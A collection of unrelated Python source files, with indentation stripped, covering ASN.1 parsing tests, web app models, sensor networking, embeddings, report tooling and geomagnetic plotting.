data = b'\x2C\x80\x0C\x02\x61\x62\x0C\x01\x63\x00\x00'
a = core.UTF8String.load(data)
self.assertEqual('abc', a.native)
self.assertEqual('abc', a.__unicode__())
self.assertEqual(1, a.method)
# Ensure a forced re-encoding is proper DER
self.assertEqual(b'\x0C\x03\x61\x62\x63', a.dump(force=True))
# Test copying moves internal state
self.assertEqual(a._unicode, a.copy()._unicode)
def test_indefinite_length_bit_string(self):
data = b'#\x80\x03\x02\x00\x01\x03\x02\x02\x04\x00\x00'
a = core.BitString.load(data)
self.assertEqual((0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 1), a.native)
self.assertEqual((0, 0), a.unused_bits)
# Example from X.690 §8.6.4.2
prim = core.BitString.load(b'\x03\x07\x04\x0A\x3B\x5F\x29\x1C\xD0')
self.assertEqual((0, 0, 0, 0), prim.unused_bits)
indef = core.BitString.load(b'\x23\x80\x03\x03\x00\x0a\x3b\x03\x05\x04\x5f\x29\x1c\xd0\x00\x00')
self.assertEqual(prim.native, indef.native)
self.assertEqual(core._int_to_bit_tuple(0x0A3B5F291CD, 44), indef.native)
self.assertEqual((0, 0, 0, 0), indef.unused_bits)
unused = core.BitString.load(b'\x23\x80\x03\x03\x00\x0a\x3b\x03\x05\x04\x5f\x29\x1c\xdd\x00\x00')
self.assertEqual(indef.native, unused.native)
self.assertEqual((1, 1, 0, 1), unused.unused_bits)
unused.set(indef.native)
self.assertEqual(indef.native, unused.native)
self.assertEqual((0, 0, 0, 0), unused.unused_bits)
def test_integer_bit_string(self):
a = core.IntegerBitString.load(b'\x03\x02\x04\xcb')
self.assertEqual(12, a.native)
self.assertEqual((1, 0, 1, 1), a.unused_bits)
b = a.copy()
self.assertEqual(12, b.native)
self.assertEqual((1, 0, 1, 1), b.unused_bits)
a.set(56)
self.assertEqual((), a.unused_bits)
self.assertEqual(56, a.native)
self.assertEqual(b'\x03\x02\x00\x38', a.dump())
with self.assertRaises(TypeError):
a.set('badtype')
with self.assertRaises(ValueError):
core.IntegerBitString(-1)
def test_indefinite_length_integer_bit_string(self):
data = b'#\x80\x03\x02\x00\x01\x03\x02\x00\x04\x00\x00'
a = core.IntegerBitString.load(data)
self.assertEqual(260, a.native)
self.assertEqual((), a.unused_bits)
a = core.IntegerBitString.load(b'\x23\x80\x00\x00')
self.assertEqual(0, a.native)
self.assertEqual((), a.unused_bits)
a = core.IntegerBitString.load(b'\x23\x80\x03\x01\x00\x03\x03\x03\x03\x03\x00\x00')
self.assertEqual(96, a.native)
self.assertEqual((0, 1, 1), a.unused_bits)
a.set(56)
self.assertEqual((), a.unused_bits)
self.assertEqual(56, a.native)
self.assertEqual(b'\x03\x02\x00\x38', a.dump())
@data('bit_string_error_values')
def integer_bit_string_errors(self, enc_bytes):
with self.assertRaises(ValueError):
core.IntegerBitString.load(enc_bytes).native
def test_octet_bit_string(self):
a = core.OctetBitString.load(b'\x03\x02\x04\xcb')
self.assertEqual(b'\xc0', a.native)
self.assertEqual((1, 0, 1, 1), a.unused_bits)
a.set(b'\x38')
self.assertEqual((), a.unused_bits)
self.assertEqual(b'\x38', a.native)
self.assertEqual(b'\x03\x02\x00\x38', a.dump())
with self.assertRaises(TypeError):
a.set('badtype')
def test_indefinite_length_octet_bit_string(self):
data = b'#\x80\x03\x02\x00\x01\x03\x02\x00\x04\x00\x00'
a = core.OctetBitString.load(data)
self.assertEqual(b'\x01\x04', a.native)
self.assertEqual(b'\x01\x04', a.__bytes__())
# Test copying moves internal state
self.assertEqual(a._bytes, a.copy()._bytes)
# octet bit string with unused bits
a = core.OctetBitString.load(b'\x23\x80\x03\x05\x05\x74\x65\x73\x74\x00\x00')
self.assertEqual(b'\x74\x65\x73\x60', a.native)
self.assertEqual((1, 0, 1, 0, 0), a.unused_bits)
a.set(b'\x38')
self.assertEqual((), a.unused_bits)
self.assertEqual(b'\x38', a.native)
self.assertEqual(b'\x03\x02\x00\x38', a.dump())
@data('bit_string_error_values')
def octet_bit_string_errors(self, enc_bytes):
with self.assertRaises(ValueError):
core.OctetBitString.load(enc_bytes).native
def test_indefinite_length_parsable_octet_bit_string(self):
data = b'#\x80\x03\x03\x00\x0C\x02\x03\x03\x00\x61\x62\x00\x00'
a = core.ParsableOctetBitString.load(data)
self.assertEqual(b'\x0C\x02\x61\x62', a.parsed.dump())
self.assertEqual(b'\x0C\x02\x61\x62', a.__bytes__())
self.assertEqual('ab', a.parsed.native)
self.assertEqual('ab', a.native)
# Test copying moves internal state
self.assertEqual(a._bytes, a.copy()._bytes)
self.assertEqual(a._parsed, a.copy()._parsed)
with self.assertRaises(ValueError):
# parsable octet bit string with unused bits
core.ParsableOctetBitString.load(b'\x23\x80\x03\x03\x04\x02\x00\x03\x03\x04\x12\xa0\x00\x00').native
def test_integer_octet_string(self):
v = core.IntegerOctetString(10)
self.assertEqual(10, v.native)
with self.assertRaises(TypeError):
core.IntegerOctetString('0')
with self.assertRaises(ValueError):
core.IntegerOctetString(-1)
def test_explicit_application_tag(self):
data = b'\x6a\x81\x03\x02\x01\x00'
ati = ApplicationTaggedInteger.load(data)
self.assertEqual(((1, 10),), ati.explicit)
self.assertEqual(0, ati.class_)
self.assertEqual(2, ati.tag)
self.assertEqual(0, ati.native)
# The output encoding is DER, whereas the input was not, so
# the length encoding changes from long form to short form
self.assertEqual(b'\x6a\x03\x02\x01\x00', ati.dump(force=True))
def test_required_field(self):
with self.assertRaisesRegex(ValueError, '"id" is missing from structure'):
Seq({'value': core.Integer(5)}).dump()
def test_explicit_application_tag_nested(self):
# tag = [APPLICATION 10] constructed; length = 18
# OUTER SEQUENCE: tag = [UNIVERSAL 16] constructed; length = 16
# outernumber : tag = [11] constructed; length = 3
# INTEGER: tag = [UNIVERSAL 2] primitive; length = 1
# 23
# inner : tag = [12] constructed; length = 9
# tag = [APPLICATION 20] constructed; length = 7
# INNER SEQUENCE: tag = [UNIVERSAL 16] constructed; length = 5
# innernumber : tag = [21] constructed; length = 3
# INTEGER: tag = [UNIVERSAL 2] primitive; length = 1
# 42
der = (
b'\x6A\x12\x30\x10\xAB\x03\x02\x01\x17\xAC\x09\x74'
b'\x07\x30\x05\xB5\x03\x02\x01\x2A'
)
ato = ApplicationTaggedOuter.load(der)
self.assertEqual(((1, 10),), ato.explicit)
self.assertEqual(0, ato.class_)
self.assertEqual(16, ato.tag)
self.assertEqual(1, ato.method)
onum = ato['outernumber']
self.assertEqual(((2, 11),), onum.explicit)
self.assertEqual(0, onum.class_)
self.assertEqual(2, onum.tag)
self.assertEqual(0, onum.method)
self.assertEqual(23, onum.native)
ati = ato['inner']
self.assertEqual(((1, 20), (2, 12)), ati.explicit)
self.assertEqual(0, ati.class_)
self.assertEqual(16, ati.tag)
self.assertEqual(util.OrderedDict([('innernumber', 42)]), ati.native)
inum = ati['innernumber']
self.assertEqual(((2, 21),), inum.explicit)
self.assertEqual(0, inum.class_)
self.assertEqual(2, inum.tag)
self.assertEqual(0, inum.method)
self.assertEqual(42, inum.native)
self.assertEqual(der, ato.dump(force=True))
def test_sequence_choice_field_by_tuple(self):
val = ExplicitField({'field': ('one', 32)})
self.assertEqual('one', val['field'].name)
self.assertEqual(32, val['field'].chosen.native)
def test_sequence_choice_field_by_dict(self):
val = ExplicitField({'field': {'two': 32}})
self.assertEqual('two', val['field'].name)
self.assertEqual(32, val['field'].chosen.native)
def test_nested_explicit_tag_choice(self):
# Explicitly tagged values have a _header that contains
# the explicit tag and the header for the contained value.
# When parsing nested Choice values, it is necessary to not pull
# up the next Choice value's header, since Choice values
# themselves don't have their own header and it will result in
# duplication.
data = b'\x30\x09\x03\x01\x00\xa0\x04\xa2\x02\x80\x00'
image_data = SpcPeImageData.load(data, strict=True)
self.assertEqual(data[2:5], image_data['flags'].dump())
self.assertEqual(data[5:11], image_data['file'].dump())
self.assertEqual(data[5:7], image_data['file']._header)
self.assertEqual(data[7:11], image_data['file'].chosen.dump())
self.assertEqual(data[7:9], image_data['file'].chosen._header)
self.assertEqual(data[9:11], image_data['file'].chosen.chosen.dump())
self.assertEqual(data[9:11], image_data['file'].chosen.chosen._header)
image_data2 = SpcPeImageData.load(data, strict=True)
self.assertEqual(data[2:5], image_data2['flags'].dump(True))
self.assertEqual(data[5:11], image_data2['file'].dump(True))
self.assertEqual(data[5:7], image_data2['file']._header)
self.assertEqual(data[7:11], image_data2['file'].chosen.dump(True))
self.assertEqual(data[7:9], image_data2['file'].chosen._header)
self.assertEqual(data[9:11], image_data2['file'].chosen.chosen.dump(True))
self.assertEqual(data[9:11], image_data2['file'].chosen.chosen._header)
def test_choice_dump_header_native(self):
s = SpcString({'unicode': 'test'})
self.assertEqual(b'\x80\x08\x00t\x00e\x00s\x00t', s.dump())
self.assertEqual(b'', s._header)
self.assertEqual('test', s.native)
self.assertEqual(b'\x80\x08', s.chosen._header)
self.assertEqual('test', s.chosen.native)
link = SpcLink('file', {'unicode': 'test'})
self.assertEqual(b'\xa2\x0a\x80\x08\x00t\x00e\x00s\x00t', link.dump())
self.assertEqual(b'', link._header)
self.assertEqual('test', link.native)
self.assertEqual(b'\xa2\x0a', link.chosen._header)
self.assertEqual('test', link.chosen.native)
self.assertEqual(b'\x80\x08', link.chosen.chosen._header)
self.assertEqual('test', link.chosen.chosen.native)
def test_parse_broken_sequence_fields_repeatedly(self):
s = Seq.load(b'\x30\x06\x88\x00\x00\x00\x00\x00')
with self.assertRaises(ValueError):
s.native
with self.assertRaises(ValueError):
s.native
def test_parse_broken_sequenceof_children_repeatedly(self):
s = SequenceOfInts.load(b'\x30\x06\x88\x00\x00\x00\x00\x00')
with self.assertRaises(ValueError):
s.native
with self.assertRaises(ValueError):
s.native
def test_wrong_asn1value(self):
with self.assertRaises(TypeError):
Seq({
'id': core.Integer(1),
'value': 1
})
def test_wrong_asn1value2(self):
with self.assertRaises(TypeError):
CopySeq({
'name': core.UTF8String('Test'),
'pair': core.Integer(1)
})
def test_wrong_asn1value3(self):
with self.assertRaises(TypeError):
NestSeqAny({
'id': '3.4.5',
'value': core.Integer(1)
})
def test_wrong_asn1value4(self):
with self.assertRaises(TypeError):
NestSeqExplicit({
'id': '3.4.5',
'value': core.Integer(1)
})
def test_integer_octet_string_encoded_width(self):
a = core.IntegerOctetString(1)
self.assertEqual(1, a.native)
self.assertEqual(b'\x04\x01\x01', a.dump())
b = core.IntegerOctetString(1)
b.set_encoded_width(4)
self.assertEqual(1, b.native)
self.assertEqual(b'\x04\x04\x00\x00\x00\x01', b.dump())
|
# -*- coding: utf-8 -*-
import numpy as np
def generateNumberArray(N_spins, max_n_spins_in_basket):
num_baskets = (N_spins/max_n_spins_in_basket+1,
N_spins/max_n_spins_in_basket)\
[N_spins-(N_spins/max_n_spins_in_basket)*\
max_n_spins_in_basket==0]
numberArray=[]
for q in range(N_spins/max_n_spins_in_basket):
numberArray.append(np.random.randint(2**(max_n_spins_in_basket) ))
if num_baskets!=(N_spins/max_n_spins_in_basket):
num_spins_in_the_last_basket =\
N_spins - (N_spins/max_n_spins_in_basket)*max_n_spins_in_basket
numberArray.append(np.random.randint(2**(num_spins_in_the_last_basket)))
return numberArray
# testing
#N_spins = 10
#max_n_spins_in_basket=4
#numberArray = generateNumberArray(N_spins, max_n_spins_in_basket)
#print numberArray |
from django.db import models
# Create your models here.
class Student(models.Model):
name = models.CharField(max_length=10)
age = models.IntegerField()
sex = models.CharField(max_length=10)
def __str__(self):
return self.name
class Course(models.Model):
name = models.CharField(max_length=10)
def __str__(self):
return self.name
|
# coding: utf-8
"""Training tools subpackage."""
__all__ = [
'Manager',
'Updater',
'ScatterPlot',
'set_log_scale',
]
from hdnnpy.training.extensions import (ScatterPlot,
set_log_scale,
)
from hdnnpy.training.manager import Manager
from hdnnpy.training.updater import Updater
|
from collections import Counter
class P8XMatrixTransformation:
def solve(self, original, target):
def c(m):
c = Counter()
for r in m:
c += Counter(r)
return c
return ("NO", "YES")[c(original) == c(target)]
|
"""
Please contact the author(s) of this library if you have any questions.
Authors: Kai-Chieh Hsu ( kaichieh@princeton.edu )
Vicenc Rubies Royo ( vrubies@berkeley.edu )
"""
from gym.envs.registration import register
register(
id="multi_player_lunar_lander_reachability-v0", entry_point=(
"gym_reachability.gym_reachability.envs:"
+ "MultiPlayerLunarLanderReachability"
)
)
register(
id="one_player_reach_avoid_lunar_lander-v0", entry_point=(
"gym_reachability.gym_reachability.envs:"
+ "OnePlayerReachAvoidLunarLander"
)
)
register(
id="dubins_car-v1",
entry_point="gym_reachability.gym_reachability.envs:DubinsCarOneEnv"
)
register(
id="dubins_car_pe-v0",
entry_point="gym_reachability.gym_reachability.envs:DubinsCarPEEnv"
)
register(
id="point_mass-v0",
entry_point="gym_reachability.gym_reachability.envs:PointMassEnv"
)
register(
id="zermelo_show-v0",
entry_point="gym_reachability.gym_reachability.envs:ZermeloShowEnv"
)
|
"""Helper functions for logging purposes."""
__all__ = ["log_function_code"]
from typing import Callable
import inspect
def log_function_code(func_to_log: Callable) -> str:
"""
Extracts function code into str.
It is used for preparing functions code to be logged into external files.
:param func_to_log: Function object for which code to be extracted.
:return: Code of the function.
"""
if not callable(func_to_log):
TypeError(f"Parameter 'func_to_log' is not function. Actual value: {func_to_log}.")
function_definition = inspect.getsource(func_to_log)
if function_definition.startswith("return "):
function_definition = function_definition[7:]
return repr(function_definition.strip())
|
import requests
import json
from library import *
def showAll(self):
res = requests.get(
'https://us-central1-kcc-library.cloudfunctions.net/showAll')
result = res.json()
showData(self, result)
def showAvailables(self):
res = requests.get(
'https://us-central1-kcc-library.cloudfunctions.net/showAvailables')
result = res.json()
showData(self, result)
def showNotAvailables(self):
res = requests.get(
'https://us-central1-kcc-library.cloudfunctions.net/showNotAvailables')
result = res.json()
showData(self, result)
def searchByTitle(self, title):
reqData = {'title': title}
url = 'https://us-central1-kcc-library.cloudfunctions.net/searchByTitle'
res = requests.get(url=url, params=reqData)
result = res.json()
showData(self, result)
def searchByAuthor(self, author):
reqData = {'author': author}
url = 'https://us-central1-kcc-library.cloudfunctions.net/searchByAuthor'
res = requests.get(url=url, params=reqData)
result = res.json()
showData(self, result)
def searchByPublisher(self, publisher):
reqData = {'publisher': publisher}
url = 'https://us-central1-kcc-library.cloudfunctions.net/searchByPublisher'
res = requests.get(url=url, params=reqData)
result = res.json()
showData(self, result)
def borrow(self, title):
reqData = {'title': title}
url = 'https://us-central1-kcc-library.cloudfunctions.net/borrow'
res = requests.get(url=url, params=reqData)
result = res.json()
if result['result'] == 1:
return "대여가 완료되었어요!"
else:
return "대여에 실패했어요"
def giveBack(self, title):
reqData = {'title': title}
url = 'https://us-central1-kcc-library.cloudfunctions.net/giveBack'
res = requests.get(url=url, params=reqData)
result = res.json()
if result['result'] == 1:
return "반납이 완료되었어요!"
else:
return "반납에 실패했어요"
def showData(self, result):
row = 0
self.result_text.setRowCount(len(result))
for key in result:
val = result[key]
for k in val.keys():
if k == 'author':
self.result_text.setItem(row, 1, QTableWidgetItem(val[k]))
if k == 'title':
self.result_text.setItem(row, 0, QTableWidgetItem(val[k]))
if k == 'publisher':
self.result_text.setItem(row, 2, QTableWidgetItem(val[k]))
row += 1
|
from socket import *
from time import *
from shumeipai.bme280 import get_temp_pressure_humidity_from_sensor
from shumeipai.power_control import blink
from shumeipai.soil_sensor import get_result_from_sensor
from shumeipai.settings import sensor_channel, ADDR, BUFSIZ
tcpCliSock = socket(AF_INET, SOCK_STREAM)
tcpCliSock.connect(ADDR)
while True:
sleep(3)
t1, t2, temperature, pressure, humidity = get_temp_pressure_humidity_from_sensor()
dry_or_humid = get_result_from_sensor(sensor_channel)
# data1 = ("Temperature : %f C, Pressure : %f hPa, Humidity : %f RH" % (temperature, pressure, humidity))
data1 = ("%.2f,%.2f,%.2f,%s" % (temperature, pressure, humidity, dry_or_humid))
if not data1:
break
tcpCliSock.send(data1.encode())
data1 = tcpCliSock.recv(BUFSIZ)
if not data1:
break
command = data1.decode('utf-8')
print(command)
if command.startswith("Watering"):
time = command[8:]
print(time)
blink(int(float(time)))
tcpCliSock.close()
|
from sentence_transformers import SentenceTransformer
import scipy.spatial
import numpy as np
import PrepareData
embedder = SentenceTransformer('output/training_stsbenchmark_roberta-base-2020-06-20_15-58-09')
corpus = PrepareData.load_data()
# Corpus with example sentences
corpus_embeddings = []
for document in corpus:
sentences_embeddings = embedder.encode(document)
sentences_embeddings = np.array(sentences_embeddings)
document_embedding = np.mean(sentences_embeddings, axis = 0)
corpus_embeddings.append(document_embedding)
# Query sentences:
#
#similarity_matrix = []
#for first_doc in corpus_embeddings:
# similarity_vector = []
# for second_doc in corpus_embeddings:
# similarity_vector.append(1 - scipy.spatial.distance.cosine(first_doc, second_doc))
# similarity_matrix.append(similarity_vector)
#
#similarity_matrix = np.array(similarity_matrix)
#print(similarity_matrix)
# Find the closest 5 sentences of the corpus for each query sentence based on cosine similarity
closest_n = 5
index = 0
for query, query_embedding in zip(corpus, corpus_embeddings):
distances = scipy.spatial.distance.cdist([query_embedding], corpus_embeddings, "cosine")[0]
results = zip(range(len(distances)), distances)
results = sorted(results, key=lambda x: x[1])
print("\n\n======================\n\n")
print("Document query index:", index)
print("\nMost similar document in corpus:")
for idx, distance in results[0:closest_n]:
print(corpus[idx][0], "(Score: %.4f)" % (1-distance))
index = index + 1
|
"""
Database stuff.
_
(Yes, I cut/pasted this from the flask docu. ¯\_(ツ)_/¯ )
"""
import sqlite3
from flask import g, session
from flask import flash
import sys
import os
from app import app
DATABASE = 'roborank'
def full_db_path(dbname=None):
if dbname is None:
dbname = DATABASE
return os.path.join(app.config['COMPETITION_DIR'], dbname + '.db')
@app.teardown_appcontext
def close_connection(exception):
db = getattr(g, '_database', None)
if db is not None:
db.close()
def query_db(query, args=(), one=False):
cur = get_db().execute(query, args)
rv = cur.fetchall()
cur.close()
return (rv[0] if rv else None) if one else rv
def get_db(dbname=None):
global DATABASE
if dbname is None:
dbname = DATABASE
DATABASE = dbname
# Does it exist yet? If not, set a flag to initialize it ... later.
if not os.path.exists(full_db_path()):
with app.app_context():
db = sqlite3.connect(full_db_path())
with app.open_resource('{}.sql'.format('roborank-template'), mode='r') as f:
try:
db.cursor().executescript(f.read())
db.commit()
print('Database "{}" created and initialized'.format(dbname))
except sqlite3.OperationalError as e:
if 'already exists' not in e.args[0]:
print("Couldn't create database '{0}': {1}".format(dbname, e.args[0]), file=sys.stderr)
return
db = sqlite3.connect(full_db_path())
db.row_factory = sqlite3.Row
return db
def row_to_dict(r):
return dict(zip(r.keys(), r)) |
from CvPythonExtensions import *
import CvUtil
import CvScreenEnums
gc = CyGlobalContext()
class CvPediaConcepts:
def __init__(self, main):
self.top = main
self.X_TEXT = self.top.X_PEDIA_PAGE
self.Y_TEXT = self.top.Y_PEDIA_PAGE
self.H_TEXT = self.top.H_PEDIA_PAGE
self.W_TEXT = self.top.W_PEDIA_PAGE
def interfaceScreen(self, iEntry):
self.placeText(iEntry)
def placeText(self, iEntry):
screen = self.top.getScreen()
panel = self.top.getNextWidgetName()
text = self.top.getNextWidgetName()
if self.top.iCategory == CvScreenEnums.PEDIA_CONCEPTS:
szText = "<font=2>" + gc.getConceptInfo(iEntry).getCivilopedia() + "</font>"
else:
szText = gc.getNewConceptInfo(iEntry).getCivilopedia()
screen.addPanel(panel, "", "", True, True, self.X_TEXT, self.Y_TEXT, self.W_TEXT, self.H_TEXT, PanelStyles.PANEL_STYLE_BLUE50)
screen.addMultilineText(text, szText, self.X_TEXT + 10, self.Y_TEXT + 10, self.W_TEXT - 10, self.H_TEXT - 20, WidgetTypes.WIDGET_GENERAL, -1, -1, CvUtil.FONT_LEFT_JUSTIFY)
def handleInput(self, inputClass):
return 0
|
import json
import os
from datetime import datetime
import click
import pytz
from click import ClickException
from cmr import render
from connect.cli.core.http import get_user_agent
from connect.cli.plugins.report.constants import AVAILABLE_RENDERERS, AVAILABLE_REPORTS
from connect.cli.plugins.report.utils import (
get_renderer_by_id,
get_report_by_id,
get_report_entrypoint,
handle_report_exception,
Progress,
)
from connect.cli.plugins.report.wizard import get_report_inputs
from connect.client import ConnectClient
from connect.reports.constants import CLI_ENV
from connect.reports.datamodels import Account, Report
from connect.reports.parser import parse
from connect.reports.renderers import get_renderer
from connect.reports.validator import validate, validate_with_schema
def load_repo(repo_dir):
cfg = os.path.join(repo_dir, 'reports.json')
if not os.path.isfile(cfg):
raise ClickException(
f'The directory `{repo_dir}` is not a reports project root directory.',
)
try:
descriptor = json.load(open(cfg, 'r'))
except json.JSONDecodeError:
raise ClickException(
'The reports project descriptor `reports.json` is not a valid json file.',
)
errors = validate_with_schema(descriptor)
if errors:
raise ClickException(f'Invalid `reports.json`: {errors}')
repo = parse(repo_dir, descriptor)
errors = validate(repo)
if errors:
raise ClickException(f'Invalid `reports.json`: {",".join(errors)}')
return repo
def list_reports(repo_dir):
repo = load_repo(repo_dir)
repo_info = [
f'# {repo.name} version {repo.version}\n',
'---\n\n',
repo.description,
'\n\n---\n\n',
]
if repo.reports:
repo_info.append(AVAILABLE_REPORTS)
for report in repo.reports:
repo_info.append(f'| {report.local_id} | {report.name} |\n')
click.echo(render(''.join(repo_info)))
def show_report_info(repo_dir, local_id):
repo = load_repo(repo_dir)
report = get_report_by_id(repo, local_id)
report_info = [
f'# {report.name} (ID: {report.local_id})\n',
'---\n\n',
report.description,
'\n\n---\n\n',
AVAILABLE_RENDERERS,
]
for renderer in report.renderers:
default = ' '
if renderer.id == report.default_renderer:
default = '\u2713'
report_info.append(
f'| {renderer.id} | {renderer.description} | {default} |\n')
click.echo(render(''.join(report_info)))
def execute_report(config, reports_dir, report_id, output_file, output_format):
repo = load_repo(reports_dir)
report = get_report_by_id(repo, report_id)
if config.active.id.startswith('VA') and 'vendor' not in report.audience:
raise ClickException(
"This report is not expected to be executed on vendor accounts",
)
if config.active.id.startswith('PA') and 'provider' not in report.audience:
raise ClickException(
"This report is not expected to be executed on provider accounts",
)
entrypoint = get_report_entrypoint(report)
client = ConnectClient(
config.active.api_key,
endpoint=config.active.endpoint,
use_specs=False,
default_limit=500,
max_retries=3,
default_headers=get_user_agent(),
)
inputs = get_report_inputs(config, client, report.get_parameters())
click.echo(f'Preparing to run report {report_id}. Please wait...\n')
progress = Progress(report.name)
renderer_def = get_renderer_by_id(report, output_format or report.default_renderer)
renderer = get_renderer(
renderer_def.type,
CLI_ENV,
reports_dir,
Account(config.active.id, config.active.name),
Report(report.local_id, report.name, report.description, inputs),
renderer_def.template,
renderer_def.args,
)
try:
args = [client, inputs, progress]
if report.report_spec == '2':
args.extend(
[
renderer_def.type,
renderer.set_extra_context,
],
)
data = entrypoint(*args)
out = renderer.render(data, output_file, start_time=datetime.now(tz=pytz.utc))
except Exception:
handle_report_exception()
return
finally:
progress.close()
click.echo(f'\nReport has been completed and saved as {out}\n')
|
# vFabric Administration Server API
# Copyright (c) 2012 VMware, Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from vas.web_server.Instances import Instance
from vas.web_server.Logs import Logs
from vas.web_server.NodeInstances import NodeInstances, NodeInstance
from vas.web_server.NodeLiveConfigurations import NodeLiveConfigurations
from vas.web_server.Nodes import Node
from vas.test.VasTestCase import VasTestCase
class TestNodeInstances(VasTestCase):
def test_list(self):
self._assert_collection(NodeInstances(self._client, 'https://localhost:8443/web-server/v1/nodes/0/instances/'))
def test_detail(self):
self._assert_item(NodeInstance(self._client, 'https://localhost:8443/web-server/v1/nodes/0/instances/3/'), [
('group_instance', lambda actual: self.assertIsInstance(actual, Instance)),
('live_configurations', lambda actual: self.assertIsInstance(actual, NodeLiveConfigurations)),
('logs', lambda actual: self.assertIsInstance(actual, Logs)),
('name', 'example'),
('node', lambda actual: self.assertIsInstance(actual, Node)),
('state', 'STOPPED')
])
def test_start(self):
NodeInstance(self._client, 'https://localhost:8443/web-server/v1/nodes/0/instances/3/').start()
self._assert_post('https://localhost:8443/web-server/v1/nodes/0/instances/3/state/', {'status': 'STARTED'})
def test_stop(self):
NodeInstance(self._client, 'https://localhost:8443/web-server/v1/nodes/0/instances/3/').stop()
self._assert_post('https://localhost:8443/web-server/v1/nodes/0/instances/3/state/', {'status': 'STOPPED'})
|
from . import db
from werkzeug.security import generate_password_hash, check_password_hash
from flask_login import UserMixin
from . import login_manager
from datetime import datetime
@login_manager.user_loader
def load_user(user_id):
return User.query.get(int(user_id))
class User(UserMixin,db.Model):
__tablename__ = 'users'
id = db.Column(db.Integer,primary_key = True)
username = db.Column(db.String(255), index = True)
email = db.Column(db.String(255),unique = True, index = True)
bio = db.Column(db.String(255))
profile_pic_path = db.Column(db.String())
password_hash = db.Column(db.String(255))
comments = db.relationship('Comment', backref='user', lazy="dynamic")
posts = db.relationship('Post', backref='user', lazy = "dynamic")
@property
def password(self):
raise AttributeError('You cannot read the password attribute')
@password.setter
def password(self, password):
self.password_hash = generate_password_hash(password)
def verify_password(self, password):
return check_password_hash(self.password_hash, password)
def __repr__(self):
return f'User {self.username}'
class Category(db.Model):
__tablename__="categories"
id=db.Column(db.Integer,primary_key=True)
name=db.Column(db.String(255))
class Post(db.Model):
__tablename__ = 'posts'
id = db.Column(db.Integer,primary_key = True)
name = db.Column(db.String(255))
text = db.Column(db.String)
title = db.Column(db.String)
username = db.Column(db.String(255), index = True)
post_id = db.Column(db.Integer)
category=db.Column(db.String(255))
posted = db.Column(db.DateTime, default=datetime.utcnow)
user_id=db.Column(db.Integer, db.ForeignKey('users.id'))
comments=db.relationship('Comment', backref='posts', lazy='dynamic')
def save_post(self):
db.session.add(self)
db.session.commit()
def get_posts(self):
posts = Post.query.all()
return posts
def get_post(self):
post = Post.query.filter_by(post_id)
return post
def __repr__(self):
return f'User {self.name}'
class Comment(db.Model):
__tablename__ = 'comments'
id = db.Column(db.Integer, primary_key=True)
post_id=db.Column(db.Integer,db.ForeignKey('posts.id'))
comment_id = db.Column(db.Integer)
title = db.Column(db.String)
username = db.Column(db.String(255), index = True)
text = db.Column(db.String)
posted = db.Column(db.DateTime, default=datetime.utcnow)
user_id = db.Column(db.Integer, db.ForeignKey("users.id"))
def save_comment(self):
db.session.add(self)
db.session.commit()
def get_comments(self):
comments = Comment.query.all()
return comments
def get_comment(self):
comment = Comment.query.filter_by(comment_id)
return comment
class Quote:
def __init__(self,id,quote,author):
self.id = id
self.quote = quote
self.author = author
|
from matplotlib.pyplot import figure
from matplotlib.ticker import ScalarFormatter
import xarray
sfmt = ScalarFormatter(useMathText=True) # for 10^3 instead of 1e3
sfmt.set_powerlimits((-2, 2))
sfmt.set_scientific(True)
sfmt.set_useOffset(False)
def plotigrf(mag: xarray.Dataset, model: str):
mode = "contour"
fg = figure(figsize=(10, 8))
ax = fg.subplots(2, 2, sharex=True)
fg.suptitle(f"IGRF{model} {mag.time}")
ax = ax.ravel()
for a, i in zip(ax, ("north", "east", "down")):
if mode == "pcolor":
# symmetric vmin,vmax centers white at zero: bwr cmap
hi = a.pcolormesh(mag.glon, mag.glat, mag[i], cmap="bwr", vmin=-6e4, vmax=6e4)
fg.colorbar(hi, ax=a, format=sfmt)
elif mode == "contour":
hi = a.contour(mag.glon, mag.glat, mag[i])
a.clabel(hi, inline=True, fmt="%0.1f")
else:
raise ValueError(f"unknown plot type {mode}")
a.set_title("{} [nT]".format(i))
for a in ax[[0, 2]]:
a.set_ylabel("Geographic latitude (deg)")
for a in ax[[2, 3]]:
a.set_xlabel("Geographic longitude (deg)")
if mag.isv == 0:
if mode == "pcolor":
hi = a.pcolormesh(mag.glon, mag.glat, mag["total"])
fg.colorbar(hi, ax=a, format=sfmt)
elif mode == "contour":
hi = a.contour(mag.glon, mag.glat, mag.total)
a.clabel(hi, inline=True, fmt="%0.1f")
else:
raise ValueError(f"unknown plot type {mode}")
a.set_title("$B$ total intensity [nT]")
# %% incl, decl
fg = figure()
fg.suptitle(f"IGRF{model} {mag.time}")
ax = fg.subplots(1, 2, sharey=True)
hi = ax[0].contour(mag.glon, mag.glat, mag.decl, range(-90, 90 + 20, 20))
ax[0].clabel(hi, inline=True, fmt="%0.1f")
ax[0].set_title("Magnetic Declination [degrees]")
hi = ax[1].contour(mag.glon, mag.glat, mag.incl, range(-90, 90 + 20, 20))
ax[1].clabel(hi, inline=True, fmt="%0.1f")
ax[1].set_title("Magnetic Inclination [degrees]")
ax[0].set_ylabel("Geographic latitude (deg)")
for a in ax:
a.set_xlabel("Geographic longitude (deg)")
def plotdiff1112(mag12: xarray.Dataset, mag11: xarray.Dataset):
for i in ("x", "y", "z"):
fg = figure()
ax = fg.gca()
hi = ax.imshow(
mag12[i] - mag11[i],
extent=(mag12.glon[0], mag12.glon[-1], mag12.glat[0], mag12.glat[-1]),
)
fg.colorbar(hi, format=sfmt)
ax.set_ylabel("latitude (deg)")
ax.set_xlabel("longitude (deg)")
ax.set_title(f"IGRF12-IGRF11 {i}-field comparison on {mag12.time}")
if mag12.isv == 0:
fg = figure()
ax = fg.gca()
hi = ax.imshow(
mag12["Btotal"] - mag11["Btotal"],
extent=(mag12.glon[0], mag12.glon[-1], mag12.glat[0], mag12.glat[-1]),
)
fg.colorbar(hi)
ax.set_xlabel("latitude (deg)")
ax.set_ylabel("longitude (deg)")
ax.set_title(f"IGRF12-IGRF11 $B$: total intensity [nT] {mag12.time}")
|
#!/usr/bin/python
import web
import MySQLdb
import sqlite3
import urllib2
render = web.template.render('templates/')
urls = (
'/', 'index',
'/login', 'login',
